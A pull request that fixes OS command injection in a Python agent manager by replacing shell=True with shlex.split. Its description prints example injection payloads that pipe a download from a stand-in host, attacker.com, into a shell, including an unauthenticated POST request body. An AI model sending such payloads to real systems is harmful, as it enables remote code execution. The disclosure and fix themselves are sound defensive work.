### PR TITLE
fix: prevent OS command injection in AgentManager via shell=True

### DIFF
--- a/python_a2a/agent_flow/utils/agent_manager.py
+++ b/python_a2a/agent_flow/utils/agent_manager.py
@@ -6,6 +6,7 @@ with auto-registration and status monitoring.
 """
 
 import os
+import shlex
 import time
 import json
 import logging
@@ -193,9 +194,9 @@ class AgentManager:
             logger.info(f"Starting agent server with command: {command}")
             
             # Start the server process
+            cmd_args = shlex.split(command) if isinstance(command, str) else command
             process = subprocess.Popen(
-                command,
-                shell=True,
+                cmd_args,
                 stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,
                 universal_newlines=True


### PR DESCRIPTION
## Summary

`AgentManager.start_agent_server` passed a caller-controlled command string to `subprocess.Popen` with `shell=True`. An unauthenticated attacker who can reach the `POST /api/create_agent` endpoint can exploit this by setting `template_id=custom_script` and providing a `script_path` containing shell metacharacters (e.g. `"ls; curl attacker.com/shell.sh | bash; echo"`), achieving **OS command injection / RCE**.

### Vulnerable code (before)
\`\`\`python
process = subprocess.Popen(
    command,       # attacker-controlled string
    shell=True,    # shell interprets metacharacters
    ...
)
\`\`\`

### Fix
Replace `shell=True` with `shlex.split()` to tokenize the command string into an argument list. The shell is never invoked, so metacharacters in any component are treated as literals.

\`\`\`python
cmd_args = shlex.split(command) if isinstance(command, str) else command
process = subprocess.Popen(cmd_args, ...)
\`\`\`

### Attack path
```
POST /api/create_agent
{"template_id": "custom_script", "port": 8080,
 "script_path": "python3 /dev/null; curl attacker.com/x | sh; echo"}
```

The `script_path` value is interpolated into `"{script_path} --port {port}"` and then executed by `/bin/sh` — no authentication required on the `/api/*` routes.

## Test plan
- [ ] Start the AgentFlow UI server
- [ ] POST to `/api/create_agent` with a benign `script_path` — agent launches correctly
- [ ] POST with `script_path` containing `;` or `&&` shell operators — command injection no longer executes; `shlex.split` tokenises as one argument instead
- [ ] Existing template IDs (openai, anthropic, etc.) continue to work

🤖 Generated with [Claude Code](https://claude.com/claude-code)